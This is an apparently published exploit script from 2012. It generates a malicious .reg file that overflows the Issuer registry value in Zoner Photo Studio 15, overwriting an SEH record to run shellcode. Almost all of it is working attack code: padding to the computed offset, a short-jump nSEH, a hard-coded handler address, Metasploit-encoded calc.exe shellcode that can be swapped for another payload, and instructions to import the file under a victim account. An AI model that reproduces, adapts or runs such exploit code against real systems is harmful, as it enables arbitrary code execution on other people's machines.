
# Title : Zoner Photo Studio v15 Build 3 (Zps.exe) Registry Value Parsing Exploit
# Published : 2012-11-12
# Author : Julien Ahrens


#!/usr/bin/python
 
# Exploit Title: Zoner Photo Studio v15 Build 3 (Zps.exe) Registry Value Parsing Local Buffer Overflow
# Version:       15 Build 3, Build 2
# Date:          2012-11-09
# Author:        Julien Ahrens
# Homepage:      http://www.inshell.net
# Software Link: http://www.zoner.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         -
# Howto:         Import the generated poc.reg under the victim account (it only writes HKEY_CURRENT_USER, so no elevation is needed), then start Zps.exe

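"""Generate poc.reg for the Zoner Photo Studio 15 "Issuer" registry-value overflow.

Zps.exe reads HKCU\\Software\\ZONER\\Zoner Photo Studio 15\\Preferences\\Certificate\\Issuer
at start-up; an oversized value overflows a buffer and overwrites an SEH record
(nSEH at offset 2136, the handler pointer right behind it).  The offset and the
handler address are hard-coded for the tested target (XP SP3 German, 15 Build 2/3)
and are not expected to survive a different build, DEP or SEHOP.

The vector is local and user-assisted: the .reg file must be imported under the
victim account (HKCU needs no elevation) and the application started afterwards.

The original listing had its backslash escapes stripped ("xCC", "nn", a broken
quoted line); they are restored here and the script is written so that it runs
under both Python 2 and Python 3 (everything is handled as bytes).
"""
from struct import pack

OUTPUT_FILE = "poc.reg"

# Target registry location (the key path is literal; double backslashes are
# only Python escaping).
REG_KEY = b"[HKEY_CURRENT_USER\\Software\\ZONER\\Zoner Photo Studio 15\\Preferences\\Certificate]"
REG_VALUE = b"Issuer"

# Bytes that must not occur anywhere in the value.  These are the bad chars the
# author passed to msfencode; 0x00 (string terminator), 0x0a/0x0d (end of the
# .reg line) and 0x22 (closing quote of the REG_SZ) follow from the file format,
# 0x93 is presumably a code-page translation on the German target (not stated).
BAD_CHARS = b"\x00\x0a\x0d\x22\x93"

# SEH layout as found by the author.
OFFSET_TO_NSEH = 2136
# nSEH: short jmp +6, skips the handler pointer and lands in the NOP sled.
NSEH = b"\xeb\x06\x90\x90"
# SEH handler: JMP DWORD PTR SS:[EBP-18].  The author notes the address lies in
# a PAGE_READWRITE region, i.e. presumably outside any image with a SafeSEH
# table, which is why the loader's SafeSEH check does not reject it.  It is
# target-specific and will not hold on a system with DEP/SEHOP enabled.
SEH = pack("<L", 0x0C7D8F13)
NOP_SLED = b"\x90" * 10
# 0xCC (int3) filler: accidental execution of the padding traps in a debugger.
FRONT_PADDING = b"\xCC" * OFFSET_TO_NSEH
TAIL_PADDING = b"\xCC" * 1000

# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d\x22\x93'
SHELLCODE = (
    b"\xbd\x55\xd9\x54\xcd\xdb\xdc\xd9\x74\x24\xf4\x5a\x33\xc9"
    b"\xb1\x33\x31\x6a\x12\x03\x6a\x12\x83\x97\xdd\xb6\x38\xeb"
    b"\x36\xbf\xc3\x13\xc7\xa0\x4a\xf6\xf6\xf2\x29\x73\xaa\xc2"
    b"\x3a\xd1\x47\xa8\x6f\xc1\xdc\xdc\xa7\xe6\x55\x6a\x9e\xc9"
    b"\x66\x5a\x1e\x85\xa5\xfc\xe2\xd7\xf9\xde\xdb\x18\x0c\x1e"
    b"\x1b\x44\xff\x72\xf4\x03\x52\x63\x71\x51\x6f\x82\x55\xde"
    b"\xcf\xfc\xd0\x20\xbb\xb6\xdb\x70\x14\xcc\x94\x68\x1e\x8a"
    b"\x04\x89\xf3\xc8\x79\xc0\x78\x3a\x09\xd3\xa8\x72\xf2\xe2"
    b"\x94\xd9\xcd\xcb\x18\x23\x09\xeb\xc2\x56\x61\x08\x7e\x61"
    b"\xb2\x73\xa4\xe4\x27\xd3\x2f\x5e\x8c\xe2\xfc\x39\x47\xe8"
    b"\x49\x4d\x0f\xec\x4c\x82\x3b\x08\xc4\x25\xec\x99\x9e\x01"
    b"\x28\xc2\x45\x2b\x69\xae\x28\x54\x69\x16\x94\xf0\xe1\xb4"
    b"\xc1\x83\xab\xd2\x14\x01\xd6\x9b\x17\x19\xd9\x8b\x7f\x28"
    b"\x52\x44\x07\xb5\xb1\x21\xf7\xff\x98\x03\x90\x59\x49\x16"
    b"\xfd\x59\xa7\x54\xf8\xd9\x42\x24\xff\xc2\x26\x21\xbb\x44"
    b"\xda\x5b\xd4\x20\xdc\xc8\xd5\x60\xbf\x8f\x45\xe8\x6e\x2a"
    b"\xee\x8b\x6e"
)


def build_payload(shellcode=SHELLCODE):
    """Return the bytes written into the Issuer value.

    Layout: padding up to nSEH, nSEH, SEH handler, NOP sled, shellcode, tail
    padding.  `shellcode` may be swapped for another encoded payload.

    Raises ValueError if any byte from BAD_CHARS ends up in the value, since
    such a byte would truncate the REG_SZ or break the .reg line and the
    exploit would silently stop working.
    """
    payload = b"".join([
        FRONT_PADDING,
        NSEH,
        SEH,
        NOP_SLED,
        shellcode,
        TAIL_PADDING,
    ])
    # bytearray iteration yields ints on both Python 2 and 3.
    data = bytearray(payload)
    hits = [c for c in bytearray(BAD_CHARS) if c in data]
    if hits:
        raise ValueError("payload contains bad chars: %s"
                         % ", ".join("0x%02x" % c for c in hits))
    return payload


def build_reg(payload):
    """Return the complete .reg file (bytes) that sets Issuer to `payload`.

    CRLF line endings are written explicitly; the original script relied on
    text-mode translation on Windows, which binary output no longer provides.
    The value is a quoted REG_SZ, hence 0x22 in BAD_CHARS.
    """
    return b"".join([
        b"Windows Registry Editor Version 5.00\r\n\r\n",
        REG_KEY + b"\r\n",
        b'"' + REG_VALUE + b'"="' + payload + b'"',
    ])


def main(out_path=OUTPUT_FILE):
    """Write the .reg file; return 0 on success, 1 on an I/O error."""
    print("[*] Creating exploit file...\n")
    try:
        # Binary mode so the 0x80-0xff bytes of the payload are written as-is.
        with open(out_path, "wb") as out:
            out.write(build_reg(build_payload()))
    except (IOError, OSError) as exc:
        # Only I/O failures are expected here; anything else should surface.
        print("[!] Error while creating file! %s" % exc)
        return 1
    print("[*] File successfully created!")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())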